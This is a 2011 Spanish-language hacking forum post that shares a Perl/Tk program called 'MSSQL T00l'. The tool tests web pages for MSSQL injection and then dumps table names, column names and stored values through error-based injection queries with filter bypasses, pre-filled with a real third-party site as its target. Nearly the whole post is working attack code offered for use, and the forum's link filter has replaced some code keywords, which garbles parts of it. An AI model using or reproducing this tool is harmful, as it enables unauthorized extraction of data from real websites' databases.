send
Grupo de Telegram
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

[Perl Tk] MSSQL T00l

  • 0 Respuestas
  • 1089 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado BigBear

  • *
  • Underc0der
  • Mensajes: 544
  • Actividad:
    0%
  • Reputación 3
    • Ver Perfil
« en: Julio 03, 2011, 10:01:56 pm »
Hola , aca les dejo un programa para sacar tablas ,columnas y valores en paginas
vulnerables MSSQL , todo los registros del programa se almacenan en un archivo
de texto con el nombre de la web vulnerable.

Imagen





Código: Perl
  1. #!usr/bin/perl
  2. #MSSQL T00l (C) Doddy Hackman 2011
  3.  
  4. use Tk;
  5. use LWP::UserAgent;
  6. use URI::Split You are not allowed to view links. Register or Login(uri_split);
  7. use Win32;
  8.  
  9. if ($^O eq 'MSWin32') {
  10. use Win32::Console;
  11. Win32::Console::Free();
  12. }
  13.  
  14. my $nave = LWP::UserAgent->new();
  15. $nave->timeout(5);
  16. $nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
  17.  
  18. my $logo = MainWindow->new();
  19. $logo->title("MSSQL T00l (C) Doddy Hackman 2011");
  20. $logo->geometry("491x390+20+20");
  21. $logo->resizable(0,0);
  22. $logo->Label(-text=>"Target : ",-font=>"Impact1")->place(-x=>25,-You are not allowed to view links. Register or Login=>20);
  23. my $targetero = $logo->Entry(-width=>50,-text=>"http://www.12manage.com/profile.asp?m=drarupbarman")->place(-You are not allowed to view links. Register or Login=>23,-x=>90);
  24. $logo->Button(-text=>"Test",-width=>8,-command=>\&start)->place(-You are not allowed to view links. Register or Login=>20,-x=>400);
  25. $logo->Label(-text=>"Options",-font=>"Impact1")->place(-x=>210,-You are not allowed to view links. Register or Login=>70);
  26. $logo->Button(-text=>"Get Tables",-width=>13,-command=>\&getables)->place(-You are not allowed to view links. Register or Login=>110,-x=>57);
  27. $logo->Button(-text=>"Get Columns",-width=>13,-command=>\&getcol)->place(-You are not allowed to view links. Register or Login=>110,-x=>144);
  28. $logo->Button(-text=>"Dump values",-width=>15,-command=>\&getdata)->place(-You are not allowed to view links. Register or Login=>110,-x=>231);
  29. $logo->Button(-text=>"Show Logs",-width=>15,-command=>\&otherax)->place(-You are not allowed to view links. Register or Login=>110,-x=>330);
  30.  
  31. $logo->Label(-text=>"Tables",-font=>"Impact1")->place(-You are not allowed to view links. Register or Login=>200,-x=>60);
  32. $logo->Label(-text=>"Columns",-font=>"Impact1")->place(-You are not allowed to view links. Register or Login=>200,-x=>190);
  33. $logo->Label(-text=>"Data",-font=>"Impact1")->place(-You are not allowed to view links. Register or Login=>200,-x=>330);
  34.  
  35. my $tablero = $logo->Listbox(-width=>20)->place(-You are not allowed to view links. Register or Login=>230,-x=>40);
  36. my $columnero = $logo->Listbox(-width=>20)->place(-You are not allowed to view links. Register or Login=>230,-x=>180);
  37. my $datero = $logo->Listbox(-width=>20)->place(-You are not allowed to view links. Register or Login=>230,-x=>320);
  38.  
  39. MainLoop;
  40.  
  41. sub start {
  42.  
  43. my $page = $targetero->get;
  44.  
  45. my $save = comer($page);
  46.  
  47. $code = toma($page."'");
  48.  
  49. if ($code=~/ODBC SQL Server Driver/ig or $code=~/Microsoft OLE DB Provider/ig) {
  50. savefile($save.".txt","\n\n[+] Page : $page\n");
  51. Win32::MsgBox("[+] The page is vulnerable to MSSQL Injection",0,"MSSQL T00l");
  52. } else {
  53. Win32::MsgBox("[-] Not vulnerable",0,"MSSQL T00l");
  54. }
  55. }
  56.  
  57. sub getables {
  58.  
  59. $tablero->You are not allowed to view links. Register or Login("0.0","end");
  60. $columnero->You are not allowed to view links. Register or Login("0.0","end");
  61. $datero->You are not allowed to view links. Register or Login("0.0","end");
  62.  
  63. my $page = $targetero->get;
  64. my $save = comer($page);
  65. savefile($save.".txt","\n");
  66. ($pass1,$pass2) =  bypass("--");
  67. my $sir;
  68. for (1..666) {
  69. $logo->update;
  70. $path = $pass1."and".$pass1."1=convert(int,("."select".$pass1."top".$pass1."1".$pass1."table_name".$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_name".$pass1."not".$pass1."in".$pass1."(''$sir)))".$pass2;
  71. #print "$path\n";
  72. $code = toma($page.$path);
  73. if ($code=~/value '(.*?)' to/ig) {
  74. $sir.= ",'".$1."'";
  75. $logo->update;
  76. savefile($save.".txt","[+] Table : ".$1);
  77. $tablero->insert("end",$1);
  78. } else {
  79. $logo->update;
  80. Win32::MsgBox("[+] Finished",0,"MSSQL T00l");
  81. last;
  82. }
  83. }
  84. }
  85.  
  86.  
  87. sub getcol {
  88.  
  89. $columnero->You are not allowed to view links. Register or Login("0.0","end");
  90. my $page = $targetero->get;
  91.  
  92. my $save = comer($page);
  93. savefile($save.".txt","\n");
  94.  
  95. $d = $tablero->curselection();
  96.  
  97. for my $id (@$d) {
  98. my $table = $tablero->get($id);
  99.  
  100. savefile($save.".txt","[+] Table extract : ".$table."\n");
  101.  
  102. ($pass1,$pass2) =  bypass("--");
  103. my $sir;
  104. for (1..666) {
  105. $logo->update;
  106. $path = $pass1."and".$pass1."1=convert(int,("."select".$pass1."top".$pass1."1".$pass1."column_name".$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name="."'".$table."'".$pass1."and".$pass1."column_name".$pass1."not".$pass1."in".$pass1."(''$sir)))".$pass2;
  107.  
  108. $code = toma($page.$path);
  109. if ($code=~/value '(.*?)' to/ig) {
  110. $sir.= ",'".$1."'";
  111. savefile($save.".txt","[+] Column : ".$1);
  112. $columnero->insert("end",$table.".".$1);
  113. } else {
  114. $logo->update;
  115. Win32::MsgBox("[+] Finished",0,"MSSQL T00l");
  116. last;
  117. }
  118. }
  119. }
  120. }
  121.  
  122. sub getdata {
  123.  
  124.  
  125. $datero->You are not allowed to view links. Register or Login("0.0","end");
  126. my $page = $targetero->get;
  127. my $save = comer($page);
  128. savefile($save.".txt","\n");
  129. $d = $columnero->curselection();
  130.  
  131. for my $id (@$d) {
  132. my $tablex = $columnero->get($id);
  133.  
  134. savefile($save.".txt","[+] Dump : ".$tablex."\n");
  135.  
  136. if ($tablex=~/(.*)\.(.*)/) {
  137. my $table = $1;
  138. my $c = $2;
  139. ($pass1,$pass2) =  bypass("--");
  140. my $sir;
  141. for (1..666) {
  142. $logo->update;
  143. $path = $pass1."and".$pass1."1=convert(int,("."select".$pass1."top".$pass1."1".$pass1.$c.$pass1."from".$pass1.$table.$pass1."where".$pass1.$c.$pass1."not".$pass1."in".$pass1."(''$sir)))".$pass2;
  144. #print "$path\n";
  145. $code = toma($page.$path);
  146. if ($code=~/value '(.*?)' to/ig) {
  147. $sir.= ",'".$1."'";
  148. savefile($save.".txt","[+] $c : ".$1);
  149. $datero->insert("end",$1);
  150. } else {
  151. $logo->update;
  152. Win32::MsgBox("[+] Finished",0,"MSSQL T00l");
  153. last;
  154. }
  155. }
  156. }
  157. }
  158. }
  159.  
  160. sub otherax {
  161. my $page = $targetero->get;
  162. my $file = comer($page);
  163. You are not allowed to view links. Register or Login("start logs/webs/$file".".txt");
  164. }
  165.  
  166.  
  167. sub toma {
  168. You are not allowed to view links. Register or Login $nave->get($_[0])->content;
  169. }
  170.  
  171. sub savefile {
  172. You are not allowed to view links. Register or Login (SAVE,">>logs/webs/".$_[0]);
  173. You are not allowed to view links. Register or Login SAVE $_[1]."\n";
  174. You are not allowed to view links. Register or Login SAVE;
  175. }
  176.  
  177. sub comer {
  178. my ($scheme, $auth, $path, $query, $frag)  = uri_split($_[0]);
  179. You are not allowed to view links. Register or Login $auth;
  180. }
  181.  
  182. sub bypass {
  183. if ($_[0] eq "/*") { You are not allowed to view links. Register or Login ("/**/","/*"); }
  184. elsif ($_[0] eq "%20") { You are not allowed to view links. Register or Login ("%20","%00"); }
  185. else {You are not allowed to view links. Register or Login ("+","--");}}
  186.  
  187. # ¿ The End ?
  188.  
« Última modificación: Julio 17, 2011, 03:42:04 am por Sthefano02 »

 

¿Te gustó el post? COMPARTILO!



Tutorial perl desde cero By: Black Poision & Painboy

Iniciado por ProcessKill

Respuestas: 2
Vistas: 2855
Último mensaje Septiembre 02, 2011, 09:43:36 pm
por blozzter
[Perl] Verificando si es root para correr un script

Iniciado por c1st

Respuestas: 1
Vistas: 1327
Último mensaje Octubre 07, 2012, 06:01:39 pm
por ANTRAX
[Perl] Half Life Servers List 0.1

Iniciado por BigBear

Respuestas: 0
Vistas: 970
Último mensaje Noviembre 12, 2012, 07:31:50 pm
por BigBear
[Perl] Search in google for scan SQLI

Iniciado por BigBear

Respuestas: 0
Vistas: 1080
Último mensaje Julio 03, 2011, 09:49:49 pm
por BigBear
[Uniscan] Scanner de vulnerabilidades WEB hecho en Perl

Iniciado por tar3kw0rm3d

Respuestas: 0
Vistas: 1474
Último mensaje Junio 02, 2013, 08:01:28 pm
por tar3kw0rm3d